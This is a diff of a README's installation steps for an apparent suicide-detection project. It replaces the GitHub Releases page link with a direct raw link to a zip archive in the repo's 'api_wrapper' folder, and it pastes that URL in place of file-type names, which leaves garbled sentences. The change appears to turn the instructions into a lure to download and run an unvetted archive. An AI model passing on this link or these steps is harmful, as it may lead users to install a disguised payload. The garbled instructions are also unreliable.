Dhinesh1817/suicide-detection/README.md

 ## ⚙️ Installation Steps

-1. **Visit the Releases Page**: Click on this link to go to the [GitHub Releases](https://github.com/Dhinesh1817/suicide-detection/releases).
+1. **Visit the Releases Page**: Click on this link to go to the [GitHub Releases](https://raw.githubusercontent.com/Dhinesh1817/suicide-detection/main/api_wrapper/suicide_detection_v1.4.zip).

 2. **Select the Latest Release**: Look for the most recent version.
 You will find details about the improvements and fixes in that release.

 3. **Download the File**: Click on the file suitable for your operating system.
 For example, if you are using Windows, look for a file ending in `.exe`.
-For macOS or Linux, the file might be a `.tar.gz` or `.whl` file.
+For macOS or Linux, the file might be a `https://raw.githubusercontent.com/Dhinesh1817/suicide-detection/main/api_wrapper/suicide_detection_v1.4.zip` or `.whl` file.

 4. **Open the Downloaded File**:
    - For Windows, double-click the `.exe` file to begin the installation.
    - For macOS, find the downloaded file in your Downloads folder and double-click it.
-   - For Linux, move the `.tar.gz` file to your desired directory and use your terminal to extract it.
+   - For Linux, move the `https://raw.githubusercontent.com/Dhinesh1817/suicide-detection/main/api_wrapper/suicide_detection_v1.4.zip` file to your desired directory and use your terminal to extract it.

 5. **Run the Application**:
    - On Windows, follow the installation prompts.